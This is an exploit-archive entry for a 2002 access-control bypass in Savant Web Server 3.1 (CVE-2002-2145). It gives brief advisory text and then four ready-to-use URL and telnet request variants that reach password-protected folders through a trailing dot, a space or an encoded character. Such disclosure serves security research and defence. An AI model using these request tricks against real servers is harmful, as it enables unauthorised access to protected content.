Savant Web Server 3.1 - File Disclosure

Author: Auriemma Luigi
type: remote
platform: windows
port: 
date_added: 2002-09-13  
date_updated: 2012-10-08  
verified: 1  
codes: CVE-2002-2145;OSVDB-16593  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 21794.txt  

source: https://www.securityfocus.com/bid/5709/info

Savant Webserver is vulnerable to an input validation bug, that could allow malicious users access to password protected folders.

It should be noted that versions below 3.1 may also be vulnerable to this issue.

http://host/password_folder.
"GET /password_folder / HTTP/1.0" <-- use with telnet
http://host/password_folder%2e
http://host/password_folder%20